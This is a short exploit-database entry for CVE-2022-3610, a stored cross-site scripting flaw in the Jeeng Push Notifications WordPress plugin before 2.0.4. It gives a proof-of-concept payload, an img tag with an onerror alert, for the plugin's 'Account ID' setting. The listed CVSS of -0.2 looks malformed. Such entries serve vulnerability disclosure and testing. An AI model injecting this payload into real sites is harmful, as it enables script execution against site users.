Exploit for Jeeng Push Notifications < 2.0.4 - Admin+ Stored Cross-Site Scripting CVE-2022-3610

Name: Exploit for Jeeng Push Notifications < 2.0.4 - Admin+ Stored Cross-Site Scripting CVE-2022-3610
Rating: 5 (44 reviews)

2022-11-02 | CVSS -0.2

## https://sploitus.com/exploit?id=WPEX-ID:33B52DD7-613F-46E4-B8EE-BEDDD31689EB
Put the following payload in the "Account ID" setting of the plugin and save: "><img src=x onerror=alert(/XSS/)>

The XSS will be triggered when accessing the settings again